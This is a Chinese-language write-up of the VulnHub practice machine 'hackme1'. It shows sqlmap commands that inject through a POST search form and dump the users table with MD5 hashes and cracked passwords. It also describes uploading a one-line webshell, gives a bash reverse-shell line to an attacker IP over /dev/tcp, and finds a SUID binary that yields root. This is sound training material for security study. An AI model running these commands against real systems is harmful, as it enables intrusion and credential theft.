vulnhub - hackme1

Mar10發表於2024-06-13

vulnhub - hackme1

資訊收集

埠掃描

image-20240613191828379

詳細掃描

image-20240613191900797

目錄掃描跟漏洞探測沒發現什麼可用資訊,除了登入還有一個uploads目錄應該是進入後臺之後才能使用

web主頁是個登入註冊頁面,爆了一下admin沒進去,隨便註冊個賬戶登入

image-20240613192040510

SQL隱碼攻擊

點選search按鈕發現是個書本目錄,這個結構很容易想到sql注入,是POST查詢的

image-20240613192341801

測試成功,sqlmap啟動。抓post包存為data.txt

image-20240613193843755

sqlmap -r data.txt --level 3 --dbs --batch

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking


sqlmap -r data.txt --level 3 -D webapphacking --tables --batch

+-------+
| books |
| users |
+-------+


sqlmap -r data.txt --level 3 -D webapphacking -T users --columns --batch

+---------+----------------------+
| Column  | Type                 |
+---------+----------------------+
| name    | varchar(30)          |
| user    | varchar(30)          |
| address | varchar(50)          |
| id      | smallint(5) unsigned |
| pasword | varchar(70)          |
+---------+----------------------+

sqlmap -r data.txt --level 3 -D webapphacking -T users -C name,user,pasword --dump --batch

+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

查詢一下superadmin的明文密碼得到Uncrackable

image-20240613194500027

檔案上傳

登入果然可以檔案上傳

image-20240613194853842

沒有過濾,直接傳一個一句話木馬,對應檔案位置為剛才掃到的uploads目錄

image-20240613194928218

反彈shell並提權

蟻劍反彈shell

bash -c 'bash -i >& /dev/tcp/192.168.157.161/9999 0>&1'

image-20240613195411444

使用find查詢可以進行suid的檔案

find / -perm -u=s -type f 2>/dev/null

發現可疑檔案/home/legacy/touchmenot,檢視後發現是個二進位制檔案

image-20240613195932360

直接執行試試

image-20240613200219324

直接提權為root